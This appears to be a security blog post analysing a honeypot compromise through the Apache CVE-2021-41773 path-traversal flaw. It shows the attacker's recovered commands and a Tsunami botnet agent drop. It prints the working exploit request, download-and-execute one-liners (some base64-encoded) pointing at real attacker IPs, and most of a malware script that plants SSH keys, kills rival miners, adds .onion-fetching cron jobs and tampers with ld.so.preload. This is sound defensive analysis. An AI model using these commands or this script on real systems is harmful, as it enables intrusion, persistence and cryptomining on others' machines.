<p>During my triage I noticed a suspicious file /var/tmp/dk86. It&#8217;s a 64-bit Linux ELF executable, owned by user &#8220;daemon&#8221;, created 2021-11-11 19:09:51 UTC. MD5 checksum is d9f82dbf8733f15f97fb352467c9ab21, and searching that on <a rel="noreferrer noopener" href="https://www.virustotal.com/gui/file/0e574fd30e806fe4298b3cbccb8d1089454f42f52892f87554325cb352646049/detection" target="_blank">VirusTotal</a> indicates that this is a Tsunami botnet agent. Strings in the binary include the Japanese phrase &#8220;nandemo shiranai wa yo, shitteru koto dake&#8221; (&#8220;I don&#8217;t know anything, only what you know&#8221;).</p>



<p>Since the file is owned by the same &#8220;daemon&#8221; user the system&#8217;s web server is running as, it&#8217;s reasonable to assume this file was created via the CVE-2021-41773 vulnerability the honeypot was created to study. So I went to the web logs under /var/log/apache2 to try and find a web request that matches the timestamp on the file. There&#8217;s an exact timestamp match on an entry from IP address 141.135.85.36.</p>



<pre class="wp-block-code"><code>141.135.85.36 - - &#091;11/Nov/2021:19:09:51 +0000] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash HTTP/1.1" 200 - "-" "-"</code></pre>



<p>There are a total of 132 logged requests from this IP on November 11 and 12. While most requests have a null user agent, there are two that are tagged as coming from &#8220;zgrab/0.x&#8221; (part of the <a href="https://zmap.io/" target="_blank" rel="noreferrer noopener">ZMapProject</a>).</p>



<pre class="wp-block-code"><code>141.135.85.36 - - &#091;11/Nov/2021:19:21:30 +0000] "GET / HTTP/1.1" 200 45 "-" "Mozilla/5.0 zgrab/0.x"
141.135.85.36 - - &#091;11/Nov/2021:19:32:04 +0000] "GET / HTTP/1.1" 200 45 "-" "Mozilla/5.0 zgrab/0.x"</code></pre>



<p><a href="https://apps.db.ripe.net/db-web-ui/query?bflag=false&amp;dflag=false&amp;rflag=true&amp;searchtext=141.135.85.36&amp;source=RIPE" target="_blank" rel="noreferrer noopener">WHOIS search</a> on the IP address comes back to a residential IP block owned by Telenet in Belgium.</p>



<p>All of the requests are POST requests. In a normal investigation, that would be the end of the story because POST request data is normally not logged. Happily, Tyler enabled mod_dumpio in the web server, which captures all the data between browser and server in the Apache error_log. There&#8217;s a lot of noise, but I&#8217;m going to use a little command-line kung fu to reduce the amount of data and am showing you some of the more interesting excerpts below.</p>



<pre class="wp-block-code"><code># <strong>grep 141.135.85.36 error_log | egrep -v '&#091;0-9]* (read)?bytes' | fgrep -v '\r\n' | sed 's/\&#091;dumpio.*data-HEAP)://; s/\&#091;pid .* AH&#091;0-9]*://'</strong>
<em>&#091;... snip ...]</em>
&#091;Thu Nov 11 19:09:14.268592 2021]  echo; ls /tmp;
&#091;Thu Nov 11 19:09:14.478663 2021]  echo; pwd
&#091;Thu Nov 11 19:09:14.696024 2021]  echo; whoami
&#091;Thu Nov 11 19:09:14.910345 2021]  echo; hostname
&#091;Thu Nov 11 19:09:29.415116 2021]  echo; wget -O /tmp/dk86 http://138.197.206.223:80/wp-content/themes/twentysixteen/dk86;
<em>&#091;... snip ...]</em>
&#091;Thu Nov 11 19:09:29.700476 2021] &#091;cgi:error]  2021-11-11 19:09:29 (346 KB/s) - '/tmp/dk86' saved &#091;48748/48748]: /bin/bash
<em>&#091;... snip ...]</em>
&#091;Thu Nov 11 19:09:29.910929 2021]  echo; pwd
&#091;Thu Nov 11 19:09:30.128200 2021]  echo; whoami
&#091;Thu Nov 11 19:09:30.348177 2021]  echo; hostname
&#091;Thu Nov 11 19:09:32.047781 2021]  P
&#091;Thu Nov 11 19:09:32.053130 2021]  echo; ls /tmp;
&#091;Thu Nov 11 19:09:32.403631 2021]  echo; pwd
&#091;Thu Nov 11 19:09:32.619051 2021]  echo; whoami
&#091;Thu Nov 11 19:09:32.835332 2021]  echo; hostname
&#091;Thu Nov 11 19:09:46.456875 2021]  echo; chmod +x /tmp/dk86;
&#091;Thu Nov 11 19:09:46.680203 2021]  echo; pwd
&#091;Thu Nov 11 19:09:46.895844 2021]  echo; whoami
&#091;Thu Nov 11 19:09:47.117973 2021]  echo; hostname
&#091;Thu Nov 11 19:09:51.416009 2021]  P
&#091;Thu Nov 11 19:09:51.419657 2021]  echo; /tmp/dk86;
&#091;Thu Nov 11 19:09:51.467033 2021] &#091;cgi:error]  no crontab for daemon: /bin/bash
&#091;Thu Nov 11 19:09:51.468329 2021] &#091;cgi:error]  no crontab for daemon: /bin/bash
&#091;Thu Nov 11 19:09:51.481268 2021] &#091;cgi:error]  no crontab for daemon: /bin/bash
&#091;Thu Nov 11 19:09:51.481589 2021] &#091;cgi:error]  no crontab for daemon: /bin/bash
<em>&#091;... snip ...]</em>
&#091;Thu Nov 11 19:32:20.965680 2021]  echo; id
&#091;Thu Nov 11 19:33:05.094087 2021]  echo; id
&#091;Thu Nov 11 19:34:03.356167 2021]  echo; id
&#091;Thu Nov 11 19:35:40.387396 2021]  echo; id
&#091;Thu Nov 11 19:39:36.040592 2021]  echo; id
&#091;Thu Nov 11 19:49:54.240192 2021]  echo; curl http://103.116.168.68/apache80</code></pre>



<p>Unfortunately, at the time of this writing neither of the URLs shown above is responding. However if you do a Google search for the 138.197.206.223 URL, there is a great deal of intel about this site, including <a rel="noreferrer noopener" href="https://nxlog.co/responsible-disclosure-monero-botnet" target="_blank">this link</a>.</p>



<p>In any event, we can get a decent idea of the sequence of events by looking at the mod_dumpio output. At 19:09:29, /tmp/dk86 gets dropped. This program is executed at 19:09:51, so we assume that this is where /var/tmp/dk86 comes from. The error output also indicates that /tmp/dk86 is trying to interact with the crontab for user &#8220;daemon&#8221;. However, we find no cron entries for this user in the system image.</p>



<p>/tmp/dk86 has been removed. There&#8217;s been so much churn in /tmp that I doubt this file is recoverable. But I might go looking for it in the future. If I find anything, I&#8217;ll write that up in a separate blog post.</p>



<p>There&#8217;s another interesting set of commands in the mod_dumpio output from Nov 12:</p>



<pre class="wp-block-code"><code>&#091;Fri Nov 12 09:10:08.135090 2021]  echo; id
&#091;Fri Nov 12 09:13:37.621551 2021]  echo; id
&#091;Fri Nov 12 09:13:39.252263 2021]  echo; curl http://172.93.50.138/d | sh
<em>&#091;... snip ...]</em>
&#091;Fri Nov 12 09:13:39.369510 2021] &#091;cgi:error]  dk86: Permission denied: /bin/bash
&#091;Fri Nov 12 09:13:39.371785 2021] &#091;cgi:error]  chmod: : /bin/bash
&#091;Fri Nov 12 09:13:39.371845 2021] &#091;cgi:error]  cannot access 'dk86': /bin/bash
&#091;Fri Nov 12 09:13:39.371900 2021] &#091;cgi:error]  : No such file or directory: /bin/bash
&#091;Fri Nov 12 09:13:39.371918 2021] &#091;cgi:error]  : /bin/bash
&#091;Fri Nov 12 09:13:39.377158 2021] &#091;cgi:error]  dk32: Permission denied: /bin/bash
&#091;Fri Nov 12 09:13:39.379557 2021] &#091;cgi:error]  sh: 1: : /bin/bash
&#091;Fri Nov 12 09:13:39.379605 2021] &#091;cgi:error]  ./dk86: not found: /bin/bash
&#091;Fri Nov 12 09:13:39.379620 2021] &#091;cgi:error]  : /bin/bash
&#091;Fri Nov 12 09:13:39.381071 2021] &#091;cgi:error]  chmod: : /bin/bash
&#091;Fri Nov 12 09:13:39.381121 2021] &#091;cgi:error]  cannot access 'dk32': /bin/bash
&#091;Fri Nov 12 09:13:39.381167 2021] &#091;cgi:error]  : No such file or directory: /bin/bash
&#091;Fri Nov 12 09:13:39.381182 2021] &#091;cgi:error]  : /bin/bash
&#091;Fri Nov 12 09:13:39.383487 2021] &#091;cgi:error]  sh: 2: : /bin/bash
&#091;Fri Nov 12 09:13:39.383625 2021] &#091;cgi:error]  ./dk32: not found: /bin/bash
&#091;Fri Nov 12 09:13:39.383641 2021] &#091;cgi:error]  : /bin/bash
&#091;Fri Nov 12 09:13:39.387727 2021] &#091;cgi:error]  dk86: Permission denied: /bin/bash
&#091;Fri Nov 12 09:13:39.388725 2021] &#091;cgi:error]  chmod: : /bin/bash
&#091;Fri Nov 12 09:13:39.388765 2021] &#091;cgi:error]  cannot access 'dk86': /bin/bash
&#091;Fri Nov 12 09:13:39.388802 2021] &#091;cgi:error]  : No such file or directory: /bin/bash
&#091;Fri Nov 12 09:13:39.388814 2021] &#091;cgi:error]  : /bin/bash
&#091;Fri Nov 12 09:13:39.389853 2021] &#091;cgi:error]  sh: 1: : /bin/bash
&#091;Fri Nov 12 09:13:39.389980 2021] &#091;cgi:error]  ./dk86: not found: /bin/bash
<em>&#091;... snip ...]</em>
&#091;Fri Nov 12 09:13:39.482184 2021] &#091;cgi:error]  bash: line 39: $(pwd)/.SgII: Permission denied: /bin/bash
&#091;Fri Nov 12 09:13:39.486157 2021] &#091;cgi:error]  bash: line 41: /usr/local/bin/.SgII: Permission denied: /bin/bash
&#091;Fri Nov 12 09:13:39.487927 2021] &#091;cgi:error]  bash: line 42: /.SgII: Permission denied: /bin/bash
&#091;Fri Nov 12 09:13:40.674001 2021] &#091;cgi:error]  grep: : /bin/bash
&#091;Fri Nov 12 09:13:40.674091 2021] &#091;cgi:error]  /.ssh/authorized_keys: /bin/bash
&#091;Fri Nov 12 09:13:40.674141 2021] &#091;cgi:error]  : No such file or directory: /bin/bash
&#091;Fri Nov 12 09:13:40.674156 2021] &#091;cgi:error]  : /bin/bash
&#091;Fri Nov 12 09:13:40.675165 2021] &#091;cgi:error]  bash: line 252: /.ssh/authorized_keys: No such file or directory: /bin/bash
&#091;Fri Nov 12 09:13:40.676620 2021] &#091;cgi:error]  bash: line 252: &#091;: -gt: unary operator expected: /bin/bash
&#091;Fri Nov 12 09:13:40.679150 2021] &#091;cgi:error]  grep: : /bin/bash
&#091;Fri Nov 12 09:13:40.679194 2021] &#091;cgi:error]  /.ssh/authorized_keys: /bin/bash
&#091;Fri Nov 12 09:13:40.679232 2021] &#091;cgi:error]  : No such file or directory: /bin/bash
&#091;Fri Nov 12 09:13:40.679244 2021] &#091;cgi:error]  : /bin/bash
&#091;Fri Nov 12 09:13:40.680151 2021] &#091;cgi:error]  bash: line 254: /.ssh/authorized_keys: No such file or directory: /bin/bash
&#091;Fri Nov 12 09:13:51.131698 2021]  echo; id
&#091;Fri Nov 12 09:13:52.076968 2021]  echo; pwd
&#091;Fri Nov 12 09:13:52.294907 2021]  echo; whoami
&#091;Fri Nov 12 09:13:52.516101 2021]  echo; hostname
&#091;Fri Nov 12 09:13:54.127156 2021]  P
&#091;Fri Nov 12 09:13:54.132660 2021]  echo; crontab -l;
&#091;Fri Nov 12 09:13:54.346927 2021]  echo; pwd
&#091;Fri Nov 12 09:13:54.566587 2021]  echo; whoami
&#091;Fri Nov 12 09:13:54.784133 2021]  echo; hostname</code></pre>



<p>The 172.93.50.138 URL is responsive and returns the following:</p>



<pre class="wp-block-code"><code>wget -O dk86 http://138.197.206.223:80/wp-content/themes/twentysixteen/dk86; chmod +x dk86; ./dk86 &amp;
wget -O dk32 http://138.197.206.223:80/wp-content/themes/twentysixteen/dk32; chmod +x dk32; ./dk32 &amp;

echo "d2dldCAtTyBkazg2IGh0dHA6Ly8xMzguMTk3LjIwNi4yMjM6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5c2l4dGVlbi9kazg2OyBjaG1vZCAreCBkazg2OyAuL2RrODYgJg==" | base64 -d | sh
echo "Y3VybCBodHRwOi8vMTU5Ljg5LjE4Mi4xMTcvd3AtY29udGVudC90aGVtZXMvdHdlbnR5c2V2ZW50ZWVuL2xkbSB8IGJhc2g=" | base64 -d | sh</code></pre>



<p>And here it is without the base64 encoding:</p>



<pre class="wp-block-code"><code>wget -O dk86 http://138.197.206.223:80/wp-content/themes/twentysixteen/dk86; chmod +x dk86; ./dk86 &amp;
wget -O dk32 http://138.197.206.223:80/wp-content/themes/twentysixteen/dk32; chmod +x dk32; ./dk32 &amp;

echo 'wget -O dk86 http://138.197.206.223:80/wp-content/themes/twentysixteen/dk86; chmod +x dk86; ./dk86 &amp;' | sh
echo 'curl http://159.89.182.117/wp-content/themes/twentyseventeen/ldm | bash' | sh</code></pre>



<p>As I noted above, the 138.197.206.223 URL is non-responsive. But I got a very interesting script back from hxxp://159.89.182.117/wp-content/themes/twentyseventeen/ldm which I&#8217;m reproducing at the end of this blog post. The script really needs root privileges to execute, which were never achieved during this compromise. However, you can read through the script and extract plenty of interesting items for your threat intel teams, including a .onion URL, plus an embedded SSH public key that the script tries to put into /root/.ssh/authorized_keys. There&#8217;s also some attempted manipulation of /etc/ld.so.preload, which is indicative of an LD_PRELOAD type rootkit like the ones Craig Rowland has been <a rel="noreferrer noopener" href="https://www.sandflysecurity.com/blog/linux-stealth-rootkit-malware-with-edr-evasion-analyzed/" target="_blank">blogging</a> <a rel="noreferrer noopener" href="https://www.sandflysecurity.com/blog/log4j-kinsing-linux-malware-in-the-wild/" target="_blank">about</a>.</p>



<p>Ultimately our dk86 compromise never really got going due to lack of privileges. But that doesn&#8217;t mean we can&#8217;t extract a great deal of useful indicators for future compromise attempts. In upcoming blog posts I will be digging into other compromises on the honeypot that actually achieved their goals. Stay tuned!</p>



<pre class="wp-block-code"><code>#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
RHOST="sgzhooqkd2i3d4z4v7pjhlj2ddbpqoda4v4lcrciblj7nvccepajufad"

TOR1=".tor2web.su/"
TOR2=".onion.ly/"
TOR3=".onion.ws/"
RPATH1='src/ldm'

TIMEOUT="75"
CTIMEOUT="22"
COPTS="-fsSLk --retry 2 --connect-timeout ${CTIMEOUT} --max-time ${TIMEOUT}"
WOPTS="--quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=${CTIMEOUT} --timeout=${TIMEOUT}"

C1=""
C2=""

sudoer=1
sudo=''
if &#091; "$(whoami)" != "root" ]; then
    sudo="sudo "
    timeout -k 5 1 sudo echo 'kthreadd' 2&gt;/dev/null &amp;&amp; sudoer=1||{ sudo=''; sudoer=0; }
fi

if &#091; $(rm --help 2&gt;/dev/null|grep " rm does not remove dir"|wc -l) -ne 0 ]; then rm="rm"; elif &#091; $(rrn --help 2&gt;/dev/null|grep " rm does not remove dir"|wc -l) -ne 0 ]; then rm="rrn"; else rm="echo"; for f in /bin/*; do strings $f 2&gt;/dev/null|grep -qi " rm does not remove dir" &amp;&amp; rm="$f" &amp;&amp; ${sudo} mv -f $rm /bin/rrn &amp;&amp; break; done; fi
if &#091; $(curl --help 2&gt;/dev/null|grep -i "Dump libcurl equivalent"|wc -l) -ne 0 ]; then curl="curl"; elif &#091; $(lxc --help 2&gt;/dev/null|grep -i "Dump libcurl equivalent"|wc -l) -ne 0 ]; then curl="lxc"; else curl="echo"; for f in ${bpath}/*; do strings $f 2&gt;/dev/null|grep -qi "Dump libcurl equivalent" &amp;&amp; curl="$f" &amp;&amp; ${sudo} mv -f $curl ${bpath}/lxc &amp;&amp; break; done; fi
if &#091; $(wget --version 2&gt;/dev/null|grep -i "wgetrc "|wc -l) -ne 0 ]; then wget="wget"; elif &#091; $(lxw --version 2&gt;/dev/null|grep -i "wgetrc "|wc -l) -ne 0 ]; then wget="lxw"; else wget="echo"; for f in ${bpath}/*; do strings $f 2&gt;/dev/null|grep -qi ".wgetrc'-style command" &amp;&amp; wget="$f" &amp;&amp; ${sudo} mv -f $wget ${bpath}/lxw &amp;&amp; break; done; fi

if &#091; $(command -v nohup|wc -l) -ne 0 ] &amp;&amp; &#091; "$1" != "-n" ] &amp;&amp; &#091; -f "$0" ]; then
    ${sudo} chmod +x "$0"
    nohup ${sudo} "$0" -n &gt;/dev/null 2&gt;&amp;1 &amp;
    echo 'Sent!'
    exit $?
fi

rand=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c $(shuf -i 4-16 -n 1) ; echo ''); if &#091; -z ${rand} ]; then rand='.tmp'; fi
echo "${rand}" &gt; "$(pwd)/.${rand}" 2&gt;/dev/null &amp;&amp; LPATH="$(pwd)/.cache/"; ${rm} -f "$(pwd)/.${rand}" &gt;/dev/null 2&gt;&amp;1
echo "${rand}" &gt; "/tmp/.${rand}" 2&gt;/dev/null &amp;&amp; LPATH="/tmp/.cache/"; ${rm} -f "/tmp/.${rand}" &gt;/dev/null 2&gt;&amp;1
echo "${rand}" &gt; "/usr/local/bin/.${rand}" 2&gt;/dev/null &amp;&amp; LPATH="/usr/local/bin/.cache/"; ${rm} -f "/usr/local/bin/.${rand}" &gt;/dev/null 2&gt;&amp;1
echo "${rand}" &gt; "${HOME}/.${rand}" 2&gt;/dev/null &amp;&amp; LPATH="${HOME}/.cache/"; ${rm} -f "${HOME}/.${rand}" &gt;/dev/null 2&gt;&amp;1
mkdir -p ${LPATH} &gt;/dev/null 2&gt;&amp;1
${sudo} chattr -i ${LPATH} &gt;/dev/null 2&gt;&amp;1; chmod 755 ${LPATH} &gt;/dev/null 2&gt;&amp;1; ${sudo} chattr +a ${LPATH} &gt;/dev/null 2&gt;&amp;1

skey="ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQBtGZHLQlMLkrONMAChDVPZf+9gNG5s2rdTMBkOp6P7mKIQ/OkbgiozmZ3syhELI4L0M1TmJiRbbrIta8662z4WAKhXpiU22llfwrkN0m8yKJApd8lDzvvdBw+ShzJr+WaEWX7uW3WCe5NCxGxc6AU7c2vmuLlO0B203pIGVIbV1xJmj6MXrdZpNy7QRo9zStWmgmVY4GR4v26R3XDOn1gshuQ6PgUqgewQ+AlslLVuekdH23sLQfejXyJShcoFI6BbH67YTcoh4G/TuQdGe8lIeAAmp7lzzHMyu+2iSNoFFCeF48JSA2YZvssFOsGuAtV/9uPNQoi9EyvgM2mGDgJJ"
if &#091; "$(whoami)" != "root" ]; then sshdir="${HOME}/.ssh"; else sshdir='/root/.ssh'; fi

hload=$(ps aux|grep -v 'l0'|grep -v 'eth1'|grep -v 'lan0'|grep -v '^-'| grep -v 'eth0'|grep -v 'inet0'|grep -v 'lano'|grep -v grep|grep -v defunct|grep -v "knthread"|grep -vi 'aaaaaaaaaa'|grep -vi 'java '|grep -vi 'jenkins'|grep -vi 'exim'|awk '{if($3&gt;=54.0) print $11}'|head -n 1)
&#091; "${hload}" != "" ] &amp;&amp; { ps ax|grep -v grep|grep -v defunct|grep -v knthread|grep -F "${hload}"|while read pid _; do if &#091; ${pid} -gt 301 ] &amp;&amp; &#091; "$pid" != "$$" ]; then echo "killing: ${pid}"; kill -9 "${pid}" &gt;/dev/null 2&gt;&amp;1; fi; done; }

hload2=$(ps aux|grep -v 'l0'|grep -v 'eth1'|grep -v 'lan0'| grep -v '^-' | grep -v 'eth0'|grep -v 'inet0'|grep -v 'lano'|grep -v grep|grep -v defunct|grep -v python|grep -v knthread|grep -vi 'aaaaaaaaaa'|grep -vi "bash"|grep -vi 'exim'|awk '{if($3&gt;=0.0) print $2}'|uniq)
if &#091;&#091; ! "${hload2}" == "" ]]; then
    for p in ${hload2}; do
        xm=''
        if &#091;&#091; $p -gt 301 ]] &amp;&amp; &#091;&#091; ! "$pid" == "$$" ]] &amp;&amp; &#091;&#091; ! "$pid" == "$PPID" ]]; then
            if &#091; -f /proc/${p}/exe ]; then
                xmf="$(readlink /proc/${p}/exe 2&gt;/dev/null)"
                xm=$(grep -i "xmr\|cryptonight\|hashrate" /proc/${p}/exe 2&gt;&amp;1)
            elif &#091; -f /proc/${p}/comm ]; then
                xmf="$(readlink /proc/${p}/cwd)/$(cat /proc/${p}/comm)"
                xm=$(grep -i "xmr\|cryptonight\|hashrate" ${xmf} 2&gt;&amp;1)
            fi
            if &#091;&#091; "${xm}" == *"matches"* ]]; then
                                echo "killing ${p} and removing: ${xmf}"
                                kill -9 ${p} &gt;/dev/null 2&gt;&amp;1
                                ${rm} -rf ${xmf} &gt;/dev/null 2&gt;&amp;1
                        fi
        fi
    done
fi

sockz() {
        n=(doh.defaultroutes.de dns.hostux.net dns.dns-over-https.com uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.flatuslifir.is doh.li dns.digitale-gesellschaft.ch)
        p=$(echo "dns-query?name=relay.l33t-ppl.info")
        s=$(${curl} ${COPTS} https://${n&#091;$((RANDOM%13))]}/$p | grep -oE "\b(&#091;0-9]{1,3}\.){3}&#091;0-9]{1,3}\b" |tr ' ' '\n'|sort -uR|head -1)
}

cik() {
        CS="SHELL=/bin/bash\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=''\nHOME=/"
        CR=$(crontab -l 2&gt;/dev/null | grep 'pty')

        if &#091; "$curl" != "echo" ]; then
                CRON11='n=(doh.defaultroutes.de dns.hostux.net dns.dns-over-https.com uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.flatuslifir.is doh.li dns.digitale-gesellschaft.ch);p=$(echo "dns-query?name=relay.l33t-ppl.info");s=$(curl https://${n&#091;$((RANDOM\\%13))]}/$p | grep -oE "\\b(&#091;0-9]{1,3}\.){3}&#091;0-9]{1,3}\\b" |tr " " "\\\\n"|sort -uR|head -1);'
                CRON11="$CRON11""FETCH_OPTS=\"-fsSLk --connect-timeout 26 --max-time 75\";""(curl -x socks5h://\$s:9050 $RHOST.onion/src/ldm || curl \${FETCH_OPTS} https://${RHOST}${TOR1}src/ldm || curl \${FETCH_OPTS} https://${RHOST}${TOR2}src/ldm || curl \${FETCH_OPTS} https://${RHOST}${TOR3}src/ldm)|bash"
        else
                CRON11="WGET_OPTS=\"--quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75\";(wget \${WGET_OPTS} https://${RHOST}${TOR1}src/ldm || wget \${WGET_OPTS} https://${RHOST}${TOR2}src/ldm || wget \${WGET_OPTS} https://${RHOST}${TOR3}src/ldm)|bash"
        fi

        C1=$(echo -e "$CS""\n""$CR""\n""* * * * * $CRON11")
        C2=$(echo -e "$CS""\n""$CR""\n""* * * * * root $CRON11")
}

net=$(${curl} -fsSLk --max-time 6 ipinfo.io/ip || ${wget} ${WOPTS} -O - ipinfo.io/ip)
if echo "${net}"|grep -q 'Could not resolve proxy'; then
    unset http_proxy; unset HTTP_PROXY; unset https_proxy; unset HTTPS_PROXY
    http_proxy=""; HTTP_PROXY=""; https_proxy=""; HTTPS_PROXY=""
fi

if &#091; ${sudoer} -eq 1 ]; then
    if &#091; -f /etc/ld.so.preload ]; then
        if &#091; $(which chattr|wc -l) -ne 0 ]; then ${sudo} chattr -i /etc/ld.so.preload &gt;/dev/null 2&gt;&amp;1; fi
        ${sudo} ln -sf /etc/ld.so.preload /tmp/.ld.so &gt;/dev/null 2&gt;&amp;1
        &gt;/tmp/.ld.so &gt;/dev/null 2&gt;&amp;1
        ${sudo} ${rm} -rf /etc/ld.so.preload* &gt;/dev/null 2&gt;&amp;1
    fi

    if &#091; -d /etc/systemd/system/ ]; then ${sudo} ${rm} -rf /etc/systemd/system/cloud* &gt;/dev/null 2&gt;&amp;1; fi
    &#091; $(${sudo} cat /etc/hosts|grep -i "onion."|wc -l) -ne 0 ] &amp;&amp; { ${sudo} chattr -i -a /etc/hosts &gt;/dev/null 2&gt;&amp;1; ${sudo} chmod 644 /etc/hosts &gt;/dev/null 2&gt;&amp;1; ${sudo} sed -i '/.onion.$/d' /etc/hosts &gt;/dev/null 2&gt;&amp;1; }
    &#091; $(${sudo} cat /etc/hosts|grep -i "tor2web."|wc -l) -ne 0 ] &amp;&amp; { ${sudo} chattr -i -a /etc/hosts &gt;/dev/null 2&gt;&amp;1; ${sudo} chmod 644 /etc/hosts &gt;/dev/null 2&gt;&amp;1; ${sudo} sed -i '/.tor2web.$/d' /etc/hosts &gt;/dev/null 2&gt;&amp;1; }
    &#091; $(${sudo} cat /etc/hosts|grep -i "onion.\|tor2web"|wc -l) -ne 0 ] &amp;&amp; { ${sudo} echo '127.0.0.1 localhost' &gt; /etc/hosts &gt;/dev/null 2&gt;&amp;1; }
    if &#091; -f /usr/bin/yum ]; then
        if &#091; -f /usr/bin/systemctl ]; then
            crstart="systemctl restart crond.service &gt;/dev/null 2&gt;&amp;1"
            crstop="systemctl stop crond.service &gt;/dev/null 2&gt;&amp;1"
        else
            crstart="/etc/init.d/crond restart &gt;/dev/null 2&gt;&amp;1"
            crstop="/etc/init.d/crond stop &gt;/dev/null 2&gt;&amp;1"
        fi
    elif &#091; -f /usr/bin/apt-get ]; then
        crstart="service cron restart &gt;/dev/null 2&gt;&amp;1"
        crstop="service cron stop &gt;/dev/null 2&gt;&amp;1"
    elif &#091; -f /usr/bin/pacman ]; then
        crstart="/etc/rc.d/cronie restart &gt;/dev/null 2&gt;&amp;1"
        crstop="/etc/rc.d/cronie stop &gt;/dev/null 2&gt;&amp;1"
    elif &#091; -f /sbin/apk ]; then
        crstart="/etc/init.d/crond restart &gt;/dev/null 2&gt;&amp;1"
        crstop="/etc/init.d/crond stop &gt;/dev/null 2&gt;&amp;1"
    fi
    if &#091; ! -f "${LPATH}.sysud" ] || &#091; $(bash --version 2&gt;/dev/null|wc -l) -eq 0 ] || &#091; $(${wget} --version 2&gt;/dev/null|wc -l) -eq 0 ]; then
        if &#091; -f /usr/bin/yum ]; then
            yum install -y -q -e 0 openssh-server iptables bash curl wget zip unzip python2 net-tools e2fsprogs vixie-cron cronie &gt;/dev/null 2&gt;&amp;1
            yum reinstall -y -q -e 0 curl wget unzip bash net-tools vixie-cron cronie &gt;/dev/null 2&gt;&amp;1
            chkconfig sshd on &gt;/dev/null 2&gt;&amp;1
            chkconfig crond on &gt;/dev/null 2&gt;&amp;1;
            if &#091; -f /usr/bin/systemctl ]; then
                systemctl start sshd.service &gt;/dev/null 2&gt;&amp;1
            else
                /etc/init.d/sshd start &gt;/dev/null 2&gt;&amp;1
            fi
        elif &#091; -f /usr/bin/apt-get ]; then
            rs=$(yes | ${sudo} apt-get update &gt;/dev/null 2&gt;&amp;1)
            if echo "${rs}"|grep -q 'dpkg was interrupted'; then y | ${sudo} dpkg --configure -a; fi
            DEBIAN_FRONTEND=noninteractive ${sudo} apt-get --yes --force-yes install openssh-server iptables bash cron curl wget zip unzip python python-minimal vim e2fsprogs net-tools &gt;/dev/null 2&gt;&amp;1
            DEBIAN_FRONTEND=noninteractive ${sudo} apt-get --yes --force-yes install --reinstall curl wget unzip bash net-tools cron
            ${sudo} systemctl enable ssh
            ${sudo} systemctl enable cron
            ${sudo} /etc/init.d/ssh restart &gt;/dev/null 2&gt;&amp;1
        elif &#091; -f /usr/bin/pacman ]; then
            pacman -Syy &gt;/dev/null 2&gt;&amp;1
            pacman -S --noconfirm base-devel openssh iptables bash cronie curl wget zip unzip python2 vim e2fsprogs net-tools &gt;/dev/null 2&gt;&amp;1
            systemctl enable --now cronie.service &gt;/dev/null 2&gt;&amp;1
            systemctl enable --now sshd.service &gt;/dev/null 2&gt;&amp;1
            /etc/rc.d/sshd restart &gt;/dev/null 2&gt;&amp;1
        elif &#091; -f /sbin/apk ]; then
            #apk --no-cache -f upgrade &gt;/dev/null 2&gt;&amp;1
            apk --no-cache -f add curl wget unzip bash busybox openssh iptables python vim e2fsprogs e2fsprogs-extra net-tools openrc &gt;/dev/null 2&gt;&amp;1
            apk del openssl-dev net-tools &gt;/dev/null 2&gt;&amp;1; apk del libuv-dev &gt;/dev/null 2&gt;&amp;1;
            apk add --no-cache openssl-dev libuv-dev net-tools --repository http://dl-cdn.alpinelinux.org/alpine/v3.9/main &gt;/dev/null 2&gt;&amp;1
            rc-update add sshd &gt;/dev/null 2&gt;&amp;1
            /etc/init.d/sshd start &gt;/dev/null 2&gt;&amp;1
            if &#091; -f /etc/init.d/crond ]; then rc-update add crond &gt;/dev/null 2&gt;&amp;1; /etc/init.d/crond restart &gt;/dev/null 2&gt;&amp;1; else /usr/sbin/crond -c /etc/crontabs &gt;/dev/null 2&gt;&amp;1; fi
        fi
    fi

        if &#091; $(curl --help 2&gt;/dev/null|grep -i "Dump libcurl equivalent"|wc -l) -ne 0 ]; then curl="curl"; elif &#091; $(lxc --help 2&gt;/dev/null|grep -i "Dump libcurl equivalent"|wc -l) -ne 0 ]; then curl="lxc"; else curl="echo"; for f in ${bpath}/*; do strings $f 2&gt;/dev/null|grep -qi "Dump libcurl equivalent" &amp;&amp; curl="$f" &amp;&amp; ${sudo} mv -f $curl ${bpath}/lxc &amp;&amp; break; done; fi
        if &#091; $(wget --version 2&gt;/dev/null|grep -i "wgetrc "|wc -l) -ne 0 ]; then wget="wget"; elif &#091; $(lxw --version 2&gt;/dev/null|grep -i "wgetrc "|wc -l) -ne 0 ]; then wget="lxw"; else wget="echo"; for f in ${bpath}/*; do strings $f 2&gt;/dev/null|grep -qi ".wgetrc'-style command" &amp;&amp; wget="$f" &amp;&amp; ${sudo} mv -f $wget ${bpath}/lxw &amp;&amp; break; done; fi
        net=$(${curl} -fsSLk --max-time 6 ipinfo.io/ip || ${wget} ${WOPTS} -O - ipinfo.io/ip)
        cik &gt;/dev/null 2&gt;&amp;1

    ${sudo} chattr -i -a /var/spool/cron &gt;/dev/null 2&gt;&amp;1; ${sudo} chattr -i -a -R /var/spool/cron/ &gt;/dev/null 2&gt;&amp;1; ${sudo} chattr -i -a /etc/cron.d &gt;/dev/null 2&gt;&amp;1; ${sudo} chattr -i -a -R /etc/cron.d/ &gt;/dev/null 2&gt;&amp;1; ${sudo} chattr -i -a /var/spool/cron/crontabs &gt;/dev/null 2&gt;&amp;1; ${sudo} chattr -i -a -R /var/spool/cron/crontabs/ &gt;/dev/null 2&gt;&amp;1
